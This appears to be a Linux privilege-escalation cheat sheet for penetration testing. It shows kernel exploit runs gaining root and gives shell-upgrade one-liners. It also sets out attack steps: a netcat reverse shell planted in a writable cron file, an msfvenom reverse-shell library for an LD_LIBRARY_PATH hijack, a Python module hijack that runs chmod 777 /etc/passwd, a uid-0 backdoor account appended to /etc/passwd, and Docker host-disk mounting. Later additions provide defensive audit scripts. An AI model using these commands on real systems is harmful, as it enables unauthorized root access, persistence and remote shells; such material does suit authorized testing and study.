
Linux Privilege Escalation

Upgrade Shell

PayloadsAllTheThings: Spawn TTY Shell

Spawning a TTY Shell

python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
/usr/bin/script -qc /bin/sh /dev/null
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
echo os.system('/bin/bash')
/bin/sh -i
lua: os.execute('/bin/sh')

(From within IRB)

exec "/bin/sh"

(From within vi)

:set shell=/bin/bash:shell

(From within nmap)


Export Terminal

export TERM=xterm


stty raw -echo; fg
stty rows 42 columns 172

User Enumeration

Current User

hostname && whoami && id

Which users have a valid shell

grep -vE "nologin|false" /etc/passwd


pwd; ls -la

OS & Architecture & Kernel

Kernel version and Architecture

uname -a
cat /etc/issue; uname -r; arch

What's the OS?

cat /etc/*-release
lsb_release -a (Debian based OSs)

Drivers & Kernel Modules

/sbin/modinfo <name>

Compile exploit in C/C++

Size.c:

#include <stdio.h>   /* prints 4 when built with -m32, 8 on x86_64 */
int main(void) {
    printf("Size = %zu\n", sizeof(size_t));
}

$ gcc -m32 Size.c -o x86-S
$ ./x86-S
Size = 4 
$ gcc Size.c -o x64-S
$ ./x64-S
Size = 8

<= 2.6.36-rc8 - 'RDS Protocol'

www-data@ip:/tmp$ uname -a
Linux ip 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:10:02 UTC 2010 i686 GNU/Linux

gcc -m32 15285.c -o 15285
www-data@ip:/tmp$ ./15285
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc08c8c2c
 [+] Resolved default_security_ops to 0xc0773300
 [+] Resolved cap_ptrace_traceme to 0xc02f3dc0
 [+] Resolved commit_creds to 0xc016dcc0
 [+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# id
uid=0(root) gid=0(root)

<= 2.6.37 'Full-Nelson'

www-data@popcorn:/home/george$ uname -a
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
www-data@popcorn:/home/george$ cat /etc/issue
cat /etc/issue
Ubuntu 9.10 \n \l

www-data@popcorn:/var/www$ gcc 15704.c -o 15704
gcc 15704.c -o 15704
www-data@popcorn:/var/www$ chmod +x 15704
chmod +x 15704
www-data@popcorn:/var/www$ ./15704
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xf846a280
 [+] Resolved econet_ops to 0xf846a360
 [+] Resolved commit_creds to 0xc01645d0
 [+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Calculating target...
[*] Failed to set Econet address.
[*] Triggering payload...
[*] Got root!
# whoami

2.6.39 < 3.2.2 (x86/x64)

www-data@hades:/tmp$ uname -a
Linux hades 3.0.0-12-server #20-Ubuntu SMP Fri Oct 7 16:36:30 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux

www-data@hades:/tmp$ ./35161 
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x401ce8.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/2338/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x401cdc.
[+] Executing su with shellcode.
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

Processes and Services

ps axu

How to check if a port is in use

sudo lsof -i -P -n | grep LISTEN

List all enabled services from systemctl

systemctl list-unit-files | grep enabled

Active network connections

ss -anp
netstat -antup

Binaries That AutoElevate

find / -perm -u=s -type f -exec ls -l {} \; 2>/dev/null

sudo in Linux

Check sudo access

$ sudo -l
[sudo] password for Hades: 
Matching Defaults entries for pentesterlab on 7358cafc3ebe:
User Hades may run the following commands:
    (victim) /bin/bash

Mix cp/chown and chmod

sudo -l
Matching Defaults entries for Hades:
User Hades may run the following commands:
    (victim) /bin/chmod, /bin/cp


find / -writable -type d 2>/dev/null
find / -writable 2>/dev/null

File /etc/passwd

The file /etc/passwd is writable by the current user.

ls -l /etc/passwd
-rw-rw-rw- 1 root root <snip> /etc/passwd
$ openssl passwd 
Verifying - Password: 

QzKsrWCYxmRPY is the generated (crypt) password hash.

sed 's/root:x:/root:QzKsrWCYxmRPY:/' /etc/passwd > passwd
cat passwd > /etc/passwd

Generate password for new user

openssl passwd -1 -salt hades leecybersec
echo 'toor:$1$hades$KKCtexC.plAyjcJkX7War0:0:0:root:/root:/bin/bash' >> /etc/passwd

Single-quote the entry so the shell does not expand $1 and $hades inside the hash.
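
As an added check from the defender's side, not part of the original notes: a small POSIX shell audit for the /etc/passwd conditions this section depends on (a group/world-writable file, extra uid-0 accounts, hashes stored inline instead of the "x" that defers to /etc/shadow). The function names and the report format are my own.

```shell
#!/bin/sh
# Added example (not from the original notes): check a passwd file for the
# conditions the section above relies on. Takes the file path as $1 so it
# can also be run against a copy or a mounted disk image.

# Print the 10-character mode string when group or others can write $1.
passwd_writable() {
    local mode
    mode=$(ls -l "$1" | cut -c1-10)                 # e.g. -rw-rw-rw-
    case "$mode" in
        ?????w????|????????w?) printf '%s\n' "$mode"; return 0 ;;
    esac
    return 1
}

# Print "NAME:UID" for every entry with uid 0 whose name is not root
# (the appended "toor" entry from the section above would show up here).
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 ":" $3 }' "$1"
}

# Print "NAME:FIELD2" for entries whose password field is neither "x" nor
# "*", i.e. a crypt hash (or nothing at all) sits in the world-readable file.
inline_password_fields() {
    awk -F: '$2 != "x" && $2 != "*" { print $1 ":" $2 }' "$1"
}

# Live use: audit_passwd /etc/passwd
audit_passwd() {
    local f
    f=${1:-/etc/passwd}
    passwd_writable "$f" >/dev/null && echo "WRITABLE: $f"
    extra_uid0_accounts "$f" | sed 's/^/UID0: /'
    inline_password_fields "$f" | sed 's/^/INLINE-HASH: /'
}
```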

Scheduled Tasks

ls -lah /etc/cron*
cat /etc/crontab
grep "CRON" /var/log/* 2>/dev/null

Cronjob file insecure

Cron job file overwrite: the file runs as root every minute.

ls -l
-rw-rw-rw- 1 root root <snip>

The file is writable by the current user.

echo "rm /tmp/f; mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip port >/tmp/f" >>

PATH Search Order Crontab

$ cat /etc/crontab

# m h dom mon dow user  command
*/5 *   * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

==> PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

chloe@roquefort:~$ ls -ld /usr/local/bin
drwxrwsrwx 2 root staff 4096 Apr 24  2020 /usr/local/bin
cp /tmp/shell /usr/local/bin/run-parts
*/5 : "At every 5th minute."

$ sudo nc -nvlp 22
listening on [any] 22 ...
connect to [ip] from (UNKNOWN) [ip] 37228
uid=0(root) gid=0(root) groups=0(root)

Module Import Hijacking

Dynamic Library Hijacking

  *  *  *  *  * root       /usr/bin/log-sweeper

==> LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils

[hades@hades ~]$ ls -ld /usr/local/lib/dev
drwxrwxrwx 2 root root 6 Sep  7  2020 /usr/local/lib/dev
[hades@hades ~]$ ls -l /usr/bin/log-sweeper
-rwxr-xr-x. 1 root root 8800 Sep  4  2020 /usr/bin/log-sweeper
[hades@hades ~]$ /usr/bin/log-sweeper
/usr/bin/log-sweeper: error while loading shared libraries: cannot open shared object file: No such file or directory


msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=6379 -f elf-so >
[hades@hades dev]$ chmod 777 
[hades@hades dev]$ pwd
$ sudo nc -nvlp 6379
listening on [any] 6379 ...
connect to [ip] from (UNKNOWN) [ip] 55124
uid=0(root) gid=0(root) groups=0(root)
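
Added example, not from the original notes, covering both the PATH Search Order Crontab section and the LD_LIBRARY_PATH case above: a POSIX shell audit that lists crontab commands cron resolves through PATH and any directory in a colon-separated search path that group or others can write. Function names are my own; it assumes the /etc/crontab field layout (m h dom mon dow user command).

```shell
#!/bin/sh
# Added example (not from the original notes): audit the two search-order
# weaknesses shown above, a crontab whose commands are resolved through a
# PATH that contains a writable directory, and an LD_LIBRARY_PATH that does.
# Assumes the /etc/crontab layout (m h dom mon dow user command).

# Print "LINENO:WORD" for each crontab command word invoked without a "/".
# The first word after the user field and every word following a shell
# operator (&&, ||, ;, |, "(") is in command position; builtins are skipped.
bare_cron_commands() {
    awk '
      BEGIN { n = split("cd test [ echo exit true false export", b, " ")
              for (k = 1; k <= n; k++) builtin[b[k]] = 1 }
      /^[[:space:]]*#/ || NF == 0 { next }              # comment or blank
      /^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=/ { next }   # PATH=..., SHELL=...
      {
        expect = 1                                     # field 7 starts the command
        for (i = 7; i <= NF; i++) {
          if (expect && index($i, "/") == 0 && $i !~ /^[(;&|]/ && !($i in builtin))
            print NR ":" $i
          expect = ($i == "&&" || $i == "||" || $i == ";" || $i == "|" || $i == "(")
        }
      }' "$1"
}

# Print the PATH= value set in crontab $1, or cron's default when unset.
crontab_path() {
    local p
    p=$(grep '^PATH=' "$1" | tail -n 1 | cut -d= -f2-)
    printf '%s\n' "${p:-/usr/bin:/bin}"
}

# Print "DIR (mode)" for each directory of the colon-separated list $1 that
# group or others can write; usable for PATH and LD_LIBRARY_PATH alike.
writable_path_dirs() {
    local dir mode
    local IFS=':'
    for dir in $1; do
        [ -d "$dir" ] || continue
        mode=$(ls -ld "$dir" | cut -c1-10)             # e.g. drwxrwsrwx
        case "$mode" in
            ?????w????|????????w?) printf '%s (%s)\n' "$dir" "$mode" ;;
        esac
    done
}

# Live use: bare_cron_commands /etc/crontab
#           writable_path_dirs "$(crontab_path /etc/crontab)"
#           writable_path_dirs "$LD_LIBRARY_PATH"
```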

Python Module Hijacking

$ cat 

import sys

try:
    import controller          # searched along sys.path
except Exception:
    print("[!] ERROR: Unable to load controller module.")

The controller module is not found on the import path.

Create the module file and add malicious Python code.

echo 'import os;os.system("chmod 777 /etc/passwd")' >

Docker container

root@315d7648a173:/# ls -lah
-rwxr-xr-x   1 root root    0 Jun  9 13:01 .dockerenv

Mount the host disk inside the container.

mkdir -p /mnt/hola
mount /dev/sda1 /mnt/hola
mount /dev/sda2 /mnt/hola
mount /dev/sda3 /mnt/hola

Installed and Patch Levels

dpkg -l (Debian based OSs)
rpm -qa (CentOS / openSUSE )
uname -a

Networking Enumeration

Interfaces and routes

ip a

Firewall and Rules

grep -Hs iptables /etc/*

Unmounted Disks

List all mounted file systems

cat /etc/fstab

List all disks


Mount disk

sudo mount -o nolock ~/share

Enumeration Tools

Basic Linux Privilege Escalation

More Commands

history, bashrc, backup

find / -name '*history*' 2>/dev/null
find / -name '*backup*' 2>/dev/null
find / -name '*bashrc*' -exec grep password {} \; 2>/dev/null

Port Tunneling

Local Tunneling

ssh -L $myport: hades@ -i id_rsa

Remote Tunneling

ssh -R $myip:$myport: kali@$myip -i kali-idrsa


~C opens the ssh escape command line, where forwards can be added to an existing session.

Generate SSH Key

ssh-keygen -t rsa
cp authorized_keys

Add user to sudo

Create user:pass

echo -e "pass\npass" | adduser --gecos "" user
usermod -aG sudo user
sudo su - user